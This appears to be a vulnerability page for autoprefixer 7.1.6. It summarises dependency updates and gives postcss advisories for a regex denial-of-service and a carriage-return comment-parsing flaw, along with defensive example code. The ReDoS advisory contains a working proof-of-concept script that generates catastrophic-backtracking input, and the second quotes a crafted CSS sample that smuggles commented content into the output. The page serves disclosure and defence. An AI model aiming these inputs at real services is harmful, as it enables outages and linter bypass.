Autoprefixer version 7.1.6 represents a minor update to the widely-used CSS prefixing tool, building upon the foundation laid by version 7.1.5. The core functionality, centered around parsing CSS and automatically adding vendor prefixes based on Can I Use data, remains consistent. Key differences lie in the updated dependencies, offering developers subtle improvements and bug fixes. Specifically, browserslist has been bumped from version 2.5.0 to 2.5.1, potentially affecting browser target interpretation. More notably, caniuse-lite, the lifeblood of Autoprefixer's prefixing decisions, jumps from version 1.0.30000744 to 1.0.30000748. This indicates an updated database of browser compatibility data, empowering Autoprefixer to make more accurate and intelligent prefixing choices, ensuring better cross-browser compatibility for your stylesheets.
The development dependencies also see adjustments, particularly in linting and build tools. While these primarily impact maintainers and contributors, developers indirectly benefit from improved code quality and build processes. The upgrade to eslint from 4.8.0 to 4.9.0 and babel-preset-env from 1.6.0 to 1.6.1 suggests alignment with evolving JavaScript standards, potentially leading to more robust and maintainable code within the Autoprefixer library itself. Choosing version 7.1.6 offers developers the assurance of the most up-to-date browser compatibility data and incremental improvements across the development toolchain, ultimately contributing to more reliable and future-proof CSS.
All vulnerabilities related to version 7.1.6 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern \/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Builds "a{}" followed by n unterminated source-map annotation openers
// and a trailing "!" so that no "*/" ever closes the comment.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse of a benign, properly terminated annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Parse progressively longer inputs and report how long each parse takes.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
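The advisory above attributes the slowdown to a greedy sub-pattern that backtracks once per comment opener. The following is an added example written for this page, not code from PostCSS: it models the vulnerable lookup with a regex assembled from the quoted sub-pattern plus a closing "*/" (an assumption; the exact expression in lib/previous-map.js is not reproduced), and puts beside it a lookup built on lastIndexOf/indexOf whose work is bounded by the input length. The names findAnnotationRegex, findAnnotationLinear, markerRun and timeLookup are this example's own, and the inputs are constructed here.

```javascript
// Added example, not PostCSS project code. Contrasts a backtracking regex
// lookup for the source-map annotation with an indexOf-based lookup whose
// cost is linear in the input size.

// ASSUMPTION: the vulnerable lookup is modelled by this regex, formed from
// the sub-pattern quoted in the advisory ("/*", optional whitespace,
// "# sourceMappingURL=", a greedy capture) plus the closing "*/". The exact
// expression in PostCSS's lib/previous-map.js is not reproduced here.
const ANNOTATION_RE = /\/\*\s*# sourceMappingURL=(.*)\*\//;

const MARKER = "# sourceMappingURL=";

// Regex lookup. For every "/*" candidate the greedy ".*" runs to the end of
// the line and then backtracks looking for "*/"; an input that repeats the
// marker and never closes the comment makes this quadratic in the input size.
function findAnnotationRegex(css) {
  const m = css.match(ANNOTATION_RE);
  return m ? m[1].trim() : null;
}

// Linear lookup. lastIndexOf and indexOf each scan the input at most once and
// there is no backtracking, so cost stays proportional to the input length
// however many markers appear. Only the last marker is considered.
function findAnnotationLinear(css) {
  const markerAt = css.lastIndexOf(MARKER);
  if (markerAt === -1) return null;
  // The marker must sit directly inside a comment opener: "/*" then only whitespace.
  const open = css.lastIndexOf("/*", markerAt);
  if (open === -1 || css.slice(open + 2, markerAt).trim() !== "") return null;
  const close = css.indexOf("*/", markerAt + MARKER.length);
  if (close === -1) return null;
  return css.slice(markerAt + MARKER.length, close).trim();
}

// Constructed inputs: a benign annotated stylesheet and an unterminated
// marker run of the shape used in the advisory's proof of concept.
const BENIGN = "a{}/*# sourceMappingURL=a.css.map */";
function markerRun(n) {
  return "a{}" + "/*# sourceMappingURL=".repeat(n) + "!";
}

// Wall-clock cost in milliseconds of a single lookup.
function timeLookup(fn, css) {
  const start = Date.now();
  fn(css);
  return Date.now() - start;
}

console.log("benign:", findAnnotationRegex(BENIGN), findAnnotationLinear(BENIGN));
const run = markerRun(1000);
console.log("regex  ms:", timeLookup(findAnnotationRegex, run));
console.log("linear ms:", timeLookup(findAnnotationLinear, run));
```

Both lookups agree on well-formed input and both return null on the unterminated run; the difference is that the regex version's time grows with the square of the marker count while the indexOf version stays flat, which is the property to check for when reviewing any regex applied to untrusted text.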
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
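Two checks a practitioner would run against the advisories on this page, written as an added example rather than PostCSS project code: a version-range test using exactly the ranges the advisories state, and a pre-parse scan that flags and normalises the bare "\r" on which the second advisory's sample depends. The function names (compareVersions, affectedBy, findBareCarriageReturns, normalizeLineEndings) are this example's own; the claim that folding CR to LF removes the discrepancy for the quoted sample is an assumption stated in the code, and normalising input is a hardening step beside upgrading, not a substitute for it.

```javascript
// Added example, not PostCSS project code. Defender-side checks derived from
// the two advisories on this page.

// Compare two "major.minor.patch" strings. Prerelease tags are not handled,
// which is sufficient for the release versions the advisories name.
function compareVersions(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  for (let i = 0; i < 3; i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}
const lt = (a, b) => compareVersions(a, b) < 0;
const between = (v, lo, hi) =>
  compareVersions(v, lo) >= 0 && compareVersions(v, hi) <= 0;

// Affected ranges taken verbatim from the advisories: ReDoS for versions
// before 7.0.36 or 8.0.0 through 8.2.13; line-return issue before 8.4.31.
function affectedBy(version) {
  const hits = [];
  if (lt(version, "7.0.36") || between(version, "8.0.0", "8.2.13")) {
    hits.push("ReDoS in lib/previous-map.js");
  }
  if (lt(version, "8.4.31")) {
    hits.push("line return (\\r) parsing error");
  }
  return hits;
}

// Report every bare carriage return (a "\r" not followed by "\n") with its
// offset, line and column so a linter can flag the input before parsing it.
function findBareCarriageReturns(css) {
  const found = [];
  let line = 1;
  let col = 1;
  for (let i = 0; i < css.length; i++) {
    const ch = css[i];
    const bareCR = ch === "\r" && css[i + 1] !== "\n";
    if (bareCR) found.push({ offset: i, line, col });
    if (ch === "\n" || bareCR) {
      line++;
      col = 1;
    } else if (ch !== "\r") {
      col++;
    }
  }
  return found;
}

// Fold CRLF and lone CR to LF before the CSS reaches a parser.
// ASSUMPTION: this removes the discrepancy for the advisory's sample, which
// depends on a bare "\r" inside a parenthesised value. It is a pre-parse
// hardening step, not a replacement for upgrading PostCSS.
function normalizeLineEndings(css) {
  return css.replace(/\r\n?/g, "\n");
}

// Constructed from the rule quoted in the advisory.
const SAMPLE = "@font-face{ font:(\r/*);}";

console.log("postcss 8.2.13 affected by:", affectedBy("8.2.13"));
console.log("bare CRs in sample:", findBareCarriageReturns(SAMPLE));
console.log("normalised:", JSON.stringify(normalizeLineEndings(SAMPLE)));
```

The scan runs before any parser sees the stylesheet, so an untrusted file that carries a lone "\r" can be rejected or rewritten by policy rather than handed to a tokenizer whose treatment of that character differs from the consumer's.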